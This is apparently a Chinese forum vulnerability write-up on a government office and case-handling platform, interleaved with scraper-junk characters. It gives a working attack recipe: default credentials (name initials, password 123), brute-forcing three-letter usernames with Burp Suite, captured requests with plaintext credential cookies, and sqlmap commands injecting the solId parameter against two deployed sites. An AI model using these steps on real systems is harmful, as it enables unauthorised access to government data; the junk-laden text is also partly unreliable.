0 k; S5 [( j3 d% H; E5 N+ X+ L ' t' D. {/ D6 `& j. H3 n2 |
- U: j& V$ C) o) {3 V9 Y& w4 X6 h/ e: O6 Z
平台简介:) u1 D! w+ U- Q! _% _% g7 \9 @- {! v
0 m. D5 B% C: |4 P
7 H) N1 E* C6 M& N! q$ i5 d % v5 r+ I' V2 Z7 }& n
& w8 N4 S: }- B! H5 W( S) V5 L, P5 Q% C
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 ; r. Q4 r, M! c" W! V1 @
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
1 l' h* b4 {% H2 u! ^# a) ^8 O' W同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!7 j- \' L0 E+ P! O( u
: p4 x* K: ^- l9 b: _2 }# A6 V! \/ i4 p3 v
- c. b; k+ I6 W7 g , ~/ }% C7 N+ E! X# V2 z/ S
: T& Q5 W" Z0 d; x8 M
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:0 s- z& ^ `; C x' T
2 B' f3 R8 I* Z, |6 d5 n" T J0 R0 _/ b: W
" j! }/ w+ x+ u( \
( n5 y: ^) }# r# t3 F- {) q: A+ ^8 t" L% V
http://1.1.1.1:7197/cap-aco/#(案例2-); V$ ^0 g& U+ D2 q/ n! p
8 b/ E" O* u R& q- s" ~6 q
4 i; u3 h' U3 f: l6 M) f http://www.XXOO.com (案例1-官网网站)! b+ `3 c1 s4 N$ B& f6 X
& q; |! j+ v6 E# U' G; x: P3 _+ l
2 h* R& f. ~- J3 h& r, S
. u& O) ^) T! p. [; S) M* O* C
' H1 z2 \1 u2 _
( W) A) I! `9 \# _ 漏洞详情:
# w% O3 q$ x+ T5 n # a/ `# W2 r* Z" L( W; x
. e- t/ z" t J8 L 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
8 X8 d' q9 }: I- Q4 q! j) s
* w4 U7 B2 K) o' |. f; S
5 A" J% ^8 [% O7 r. M! D. M, C 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
/ |) m& G; `! | / ~3 O& y5 ?) e0 I2 }* Y
2 J8 y6 f# t1 M" A
e2 g' U% h' J
, C0 o+ h3 P0 e$ H1 r+ r
" B1 o( |' `5 N! y 3 S- r$ F4 a: z' I2 P6 ~# M: B& J
& j% P6 d4 I1 j. [. [3 r0 A! d
- V: L- s# K9 Q+ G# E& ]. O: i status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
" R! N7 k: Q; a' M; q
" p7 M2 T |, ?) r/ g3 q% O1 g3 T/ q. L9 `0 ~; Y
1、案例1-官方网站
' _5 x8 e$ @7 x S& c4 Z $ n# ]1 Y8 V4 L0 m( v4 M) V
7 u% a- R5 d+ X/ w& G3 M
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.11 ^- E z2 ?4 f7 P' ^, s# T3 I
7 A8 Z y( t$ R& c
$ D. q- {3 h3 o5 g3 E" A Host: www.XXOO.com
X( K" l& l/ t" H/ M - x; V* n- j2 p, g4 f2 Y# S0 U
& e( ?, f' H2 [0 [2 S3 A* M& V Proxy-Connection: Keep-Alive; ~$ @/ R1 j2 H; B: M9 L4 a
8 f% U1 h/ z' S# |
, m, C2 |# d/ q" [7 Y" }
Accept: application/json, text/javascript, */*; q=0.01
$ r6 I" h7 k0 r/ [# H! ] 0 Y% `, x v( R% @% D* K
& I6 u; Z9 [/ y
Accept-Language: zh-CN
5 _% y ]; k5 b0 Q; M1 | 6 w0 B# L/ o ^2 B5 x1 U/ z$ I
! m' l/ A6 w/ Z0 w7 G. p Content-Type: application/json+ s5 q- b6 ?6 V' ^6 I
4 A0 a5 J4 r9 L& e8 x
: j3 T2 o( Y# ^( ]" X8 { User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko0 d/ A8 f" O4 Z
a, v, V5 E# Z* ]9 E. z* R! q# T) z' B9 C' k) C
X-Requested-With: XMLHttpRequest
& b0 N+ B* p/ B* s7 i' r 3 u" s+ O$ F/ j$ d" O. g
6 A: @: k B" y- Q( c9 t
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002; Z5 C4 R$ z7 F M' v6 G# M, y
& `1 n+ h. q# R) m) s
4 A% R8 ?% l% h/ V- ]$ u9 A; D
Accept-Encoding: gzip, deflate, sdch
6 I+ {, F5 f1 r$ e: N) Q& j7 K
$ |! Y d) I1 \( Q
9 k$ @- Q( k- r; T# Q# M% Z, M Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e. d% Y% X2 Y' w
' J+ f! |7 J5 B6 I5 r' d0 z: n
2 d- N& o) Y6 i1 d2 W" B1 _- c 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:( h6 e' d: ~5 Q4 A, z& a3 s* ~3 D
: r9 p+ w0 H' E! c T- j$ D& s# S+ c5 f- |7 W" b
. ^+ W, o4 B/ D* ~
# ]% k! Y/ z; q7 K0 M( v- h
. O/ o! K' ?% @# S% D$ C; Q0 h+ t6 Z ; H6 v( Y9 _5 O; k
. X& g% Y- K4 P; L8 `
9 X$ }0 ` Q+ u& o; y2 e3 ^
3 z( R9 o: c5 N: ^- D6 ?7 b 8 m6 p. f% M5 y4 g4 _7 c/ @& l' O
n4 f7 h L$ P+ T
+ O2 A4 f) M3 O' S 7 x5 I9 U) s& E
: {! @% n2 a I# E, O 7 `0 r" D- M7 h$ W; m0 l8 X
# D" T# R5 v: @; r4 r* g
5 O8 ~! C: @1 K& s" D* r 2、案例2-某天河云平台7 T. F8 B$ Q. w( ]8 j
* N3 l# U. V) k, x& |
$ ~/ i6 P8 J: _; N# G8 b0 d6 n GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 |, W1 ^5 R" x! _4 @7 k6 ~- ?
% L! z+ r" }' m- J9 j- C+ y1 y& H: l& f' @( A. F1 k" C
Host: 1.1.1.:7197
3 M! L8 A: n8 v1 y* z
: F' r4 K! Y1 S& z. l$ p/ W
$ J% M' [# l: U9 q8 z8 E Accept: application/json, text/javascript, */*; q=0.01
4 S+ P- X; S- w; _( V y7 E - q' S" r7 M8 K6 E
& C7 ]4 o2 |! ^, I; {
X-Requested-With: XMLHttpRequest
5 n% U3 s$ U5 H8 n $ G. [2 O" r! Z6 c; L
" u* s) [2 }) B. i0 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
# V: e: K# E+ [
5 ]* L- a: z1 _+ B7 F* X I
0 [: f, s6 T2 z+ i2 o& H Content-Type: application/json
& R$ }7 Z( W( A9 R. V( X - I% `. f3 m G1 r J6 h
! _. e% N: a) b! F Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
$ s, b# j8 S( B3 J0 n U: L ; w, U* Q7 M$ N; ]. ]& Z
& n. G$ `, ^9 A7 x1 z) m Accept-Language: zh-CN,zh;q=0.8
* w$ k: Z! {5 S# r e
O" H* w6 v0 ^" M0 C5 A9 R* j. @% j" v h+ o
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1) `" ^# y$ D5 Z9 g
c+ B6 o4 r) K+ F @
1 ~1 W: I) M9 x ~# t Connection: close
! }8 g# @' r7 D6 O& _
# t! h w- |# `: e! m- Q( w" J X0 B0 @; G. X+ q9 _( f* p* g; p
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:3 d( e% `. B7 H% s$ I6 V3 P
' ]6 p$ X' g/ Q
. y. K* v4 r( \4 l
' L8 d) O* Q! K. c1 i& Q- p9 W 1 C; z# o' [% K& `% E7 A
2 j$ F6 N8 k8 D % r D c4 o+ L4 X% o; [3 X) _
|